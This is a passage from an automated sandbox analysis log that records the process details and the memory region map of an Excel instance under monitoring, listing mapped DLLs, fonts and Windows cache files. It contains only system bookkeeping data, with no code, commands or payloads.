# Flog Txt Version 1 # Analyzer Version: 4.4.0 # Analyzer Build Date: Dec 8 2021 20:04:45 # Log Creation Date: 11.01.2022 12:32:18.058 Process: id = "1" image_name = "excel.exe" filename = "c:\\program files (x86)\\microsoft office\\root\\office16\\excel.exe" page_root = "0x49b64000" os_pid = "0xc3c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x390" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\EXCEL.EXE\"" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 251 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 252 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 253 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 254 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 255 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 256 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 257 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 258 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 259 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 260 start_va = 0x100000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 261 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 262 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 263 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 264 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 265 start_va = 0x180000 end_va = 0x182fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 266 start_va = 0x190000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 267 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 268 start_va = 0x220000 end_va = 0x222fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 269 start_va = 0x230000 end_va = 0x232fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 270 start_va = 0x240000 end_va = 0x242fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 271 start_va = 0x250000 end_va = 0x252fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 272 start_va = 0x260000 end_va = 0x261fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 273 start_va = 0x270000 end_va = 0x271fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 274 start_va = 0x280000 end_va = 0x280fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 275 start_va = 0x290000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 276 start_va = 0x2a0000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 277 start_va = 0x2c0000 end_va = 0x2c3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 278 start_va = 0x2d0000 end_va = 0x2d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 279 start_va = 0x2e0000 end_va = 0x2e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 280 start_va = 0x2f0000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 281 start_va = 0x330000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 282 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 283 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 284 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 285 start_va = 0x460000 end_va = 0x464fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 286 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 287 start_va = 0x480000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 288 start_va = 0x580000 end_va = 0x707fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 289 start_va = 0x710000 end_va = 0x890fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 290 start_va = 0x8a0000 end_va = 0xb6efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 291 start_va = 0xb70000 end_va = 0xb70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 292 start_va = 0xb80000 end_va = 0xb80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 293 start_va = 0xb90000 end_va = 0xb91fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 294 start_va = 0xba0000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 295 start_va = 0xbe0000 end_va = 0xbeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 296 start_va = 0xbf0000 end_va = 0xc01fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 297 start_va = 0xc10000 end_va = 0xc10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c10000" filename = "" Region: id = 298 start_va = 0xc20000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 299 start_va = 0xc30000 end_va = 0xc41fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 300 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 301 start_va = 0xc60000 end_va = 0xc61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 302 start_va = 0xc70000 end_va = 0xc70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 303 start_va = 0xc80000 end_va = 0xcbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 304 start_va = 0xcc0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 305 start_va = 0xd00000 end_va = 0xd3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 306 start_va = 0xd40000 end_va = 0xe1efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d40000" filename = "" Region: id = 307 start_va = 0xe20000 end_va = 0xe21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 308 start_va = 0xe30000 end_va = 0xe6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 309 start_va = 0xe70000 end_va = 0xf6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 310 start_va = 0xf70000 end_va = 0xf71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 311 start_va = 0xf80000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 312 start_va = 0x1080000 end_va = 0x108cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Region: id = 313 start_va = 0x1090000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 314 start_va = 0x10d0000 end_va = 0x10e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 315 start_va = 0x10f0000 end_va = 0x11effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 316 start_va = 0x11f0000 end_va = 0x11f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 317 start_va = 0x1200000 end_va = 0x123ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 318 start_va = 0x1240000 end_va = 0x124cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "comdlg32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\comdlg32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\comdlg32.dll.mui") Region: id = 319 start_va = 0x1250000 end_va = 0x2c28fff monitored = 1 entry_point = 0x1251000 region_type = mapped_file name = "excel.exe" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\EXCEL.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\excel.exe") Region: id = 320 start_va = 0x2c30000 end_va = 0x402ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c30000" filename = "" Region: id = 321 start_va = 0x4030000 end_va = 0x4de1fff monitored = 0 entry_point = 0x4031000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso.dll") Region: id = 322 start_va = 0x4df0000 end_va = 0x5e22fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "xlintl32.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\1033\\XLINTL32.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\1033\\xlintl32.dll") Region: id = 323 start_va = 0x5e30000 end_va = 0x5f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e30000" filename = "" Region: id = 324 start_va = 0x5f30000 end_va = 0x5f30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f30000" filename = "" Region: id = 325 start_va = 0x5f40000 end_va = 0x5f41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005f40000" filename = "" Region: id = 326 start_va = 0x5f50000 end_va = 0x5f51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005f50000" filename = "" Region: id = 327 start_va = 0x5f60000 end_va = 0x5f61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005f60000" filename = "" Region: id = 328 start_va = 0x5f70000 end_va = 0x5f74fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorerframe.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\explorerframe.dll.mui") Region: id = 329 start_va = 0x5f80000 end_va = 0x5f80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f80000" filename = "" Region: id = 330 start_va = 0x5f90000 end_va = 0x5f90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005f90000" filename = "" Region: id = 331 start_va = 0x5fa0000 end_va = 0x609ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fa0000" filename = "" Region: id = 332 start_va = 0x60a0000 end_va = 0x60a2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000060a0000" filename = "" Region: id = 333 start_va = 0x60b0000 end_va = 0x60b2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000060b0000" filename = "" Region: id = 334 start_va = 0x60c0000 end_va = 0x60fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000060c0000" filename = "" Region: id = 335 start_va = 0x6100000 end_va = 0x6102fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006100000" filename = "" Region: id = 336 start_va = 0x6110000 end_va = 0x6112fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006110000" filename = "" Region: id = 337 start_va = 0x6120000 end_va = 0x6120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006120000" filename = "" Region: id = 338 start_va = 0x6130000 end_va = 0x622ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006130000" filename = "" Region: id = 339 start_va = 0x6230000 end_va = 0x623ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006230000" filename = "" Region: id = 340 start_va = 0x6240000 end_va = 0x6241fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006240000" filename = "" Region: id = 341 start_va = 0x6250000 end_va = 0x6250fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006250000" filename = "" Region: id = 342 start_va = 0x6260000 end_va = 0x629ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006260000" filename = "" Region: id = 343 start_va = 0x62a0000 end_va = 0x62a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062a0000" filename = "" Region: id = 344 start_va = 0x62b0000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062b0000" filename = "" Region: id = 345 start_va = 0x62c0000 end_va = 0x633ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 346 start_va = 0x6340000 end_va = 0x643ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006340000" filename = "" Region: id = 347 start_va = 0x6440000 end_va = 0x6456fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 348 start_va = 0x6460000 end_va = 0x6460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006460000" filename = "" Region: id = 349 start_va = 0x6470000 end_va = 0x6470fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006470000" filename = "" Region: id = 350 start_va = 0x6480000 end_va = 0x64bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006480000" filename = "" Region: id = 351 start_va = 0x64c0000 end_va = 0x64c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064c0000" filename = "" Region: id = 352 start_va = 0x64d0000 end_va = 0x64d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064d0000" filename = "" Region: id = 353 start_va = 0x64e0000 end_va = 0x64e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 354 start_va = 0x64f0000 end_va = 0x64f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064f0000" filename = "" Region: id = 355 start_va = 0x6500000 end_va = 0x6550fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeuil.ttf" filename = "\\Windows\\Fonts\\segoeuil.ttf" (normalized: "c:\\windows\\fonts\\segoeuil.ttf") Region: id = 356 start_va = 0x6560000 end_va = 0x656ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006560000" filename = "" Region: id = 357 start_va = 0x6570000 end_va = 0x666ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006570000" filename = "" Region: id = 358 start_va = 0x6670000 end_va = 0x6a6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006670000" filename = "" Region: id = 359 start_va = 0x6a70000 end_va = 0x6a70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a70000" filename = "" Region: id = 360 start_va = 0x6a80000 end_va = 0x6abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a80000" filename = "" Region: id = 361 start_va = 0x6ac0000 end_va = 0x6ac0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ac0000" filename = "" Region: id = 362 start_va = 0x6ad0000 end_va = 0x6ad0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ad0000" filename = "" Region: id = 363 start_va = 0x6ae0000 end_va = 0x6ae0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ae0000" filename = "" Region: id = 364 start_va = 0x6af0000 end_va = 0x6b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006af0000" filename = "" Region: id = 365 start_va = 0x6b30000 end_va = 0x6b30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b30000" filename = "" Region: id = 366 start_va = 0x6b40000 end_va = 0x6c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b40000" filename = "" Region: id = 367 start_va = 0x6c40000 end_va = 0x743ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006c40000" filename = "" Region: id = 368 start_va = 0x7440000 end_va = 0x7487fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007440000" filename = "" Region: id = 369 start_va = 0x7490000 end_va = 0x7490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007490000" filename = "" Region: id = 370 start_va = 0x74a0000 end_va = 0x74a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000074a0000" filename = "" Region: id = 371 start_va = 0x74b0000 end_va = 0x750bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\shell32.dll.mui") Region: id = 372 start_va = 0x7510000 end_va = 0x7510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007510000" filename = "" Region: id = 373 start_va = 0x7520000 end_va = 0x761ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007520000" filename = "" Region: id = 374 start_va = 0x7620000 end_va = 0x769efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 375 start_va = 0x76a0000 end_va = 0x774afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 376 start_va = 0x7750000 end_va = 0x7750fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007750000" filename = "" Region: id = 377 start_va = 0x7760000 end_va = 0x7760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007760000" filename = "" Region: id = 378 start_va = 0x7770000 end_va = 0x77affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007770000" filename = "" Region: id = 379 start_va = 0x77b0000 end_va = 0x78affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077b0000" filename = "" Region: id = 380 start_va = 0x78b0000 end_va = 0x7aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000078b0000" filename = "" Region: id = 381 start_va = 0x7ab0000 end_va = 0x7b13fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "seguisb.ttf" filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf") Region: id = 382 start_va = 0x7b20000 end_va = 0x7b23fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 383 start_va = 0x7b30000 end_va = 0x7b5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 384 start_va = 0x7b60000 end_va = 0x7b63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 385 start_va = 0x7b70000 end_va = 0x7b7dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 386 start_va = 0x7b80000 end_va = 0x7b80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b80000" filename = "" Region: id = 387 start_va = 0x7b90000 end_va = 0x7b90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b90000" filename = "" Region: id = 388 start_va = 0x7ba0000 end_va = 0x7c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ba0000" filename = "" Region: id = 389 start_va = 0x7ca0000 end_va = 0x85cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 390 start_va = 0x85d0000 end_va = 0x85d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085d0000" filename = "" Region: id = 391 start_va = 0x85e0000 end_va = 0x85e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000085e0000" filename = "" Region: id = 392 start_va = 0x85f0000 end_va = 0x86c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085f0000" filename = "" Region: id = 393 start_va = 0x86d0000 end_va = 0x86d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000086d0000" filename = "" Region: id = 394 start_va = 0x86e0000 end_va = 0x86e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000086e0000" filename = "" Region: id = 395 start_va = 0x86f0000 end_va = 0x86f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086f0000" filename = "" Region: id = 396 start_va = 0x8700000 end_va = 0x8700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008700000" filename = "" Region: id = 397 start_va = 0x8710000 end_va = 0x874ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008710000" filename = "" Region: id = 398 start_va = 0x8750000 end_va = 0x8753fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 399 start_va = 0x8760000 end_va = 0x87a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008760000" filename = "" Region: id = 400 start_va = 0x87b0000 end_va = 0x87effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087b0000" filename = "" Region: id = 401 start_va = 0x87f0000 end_va = 0x87f0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db") Region: id = 402 start_va = 0x8800000 end_va = 0x883ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 403 start_va = 0x8840000 end_va = 0x88a5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 404 start_va = 0x88b0000 end_va = 0x88b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 405 start_va = 0x88c0000 end_va = 0x88c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{228385d3-b646-481b-b0de-f0c3a58f5423}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{228385D3-B646-481B-B0DE-F0C3A58F5423}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{228385d3-b646-481b-b0de-f0c3a58f5423}.2.ver0x0000000000000001.db") Region: id = 406 start_va = 0x88d0000 end_va = 0x88d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 407 start_va = 0x88e0000 end_va = 0x88e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{87178f01-581a-45f0-9991-3f918faa83f1}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{87178F01-581A-45F0-9991-3F918FAA83F1}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{87178f01-581a-45f0-9991-3f918faa83f1}.2.ver0x0000000000000001.db") Region: id = 408 start_va = 0x88f0000 end_va = 0x88f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: 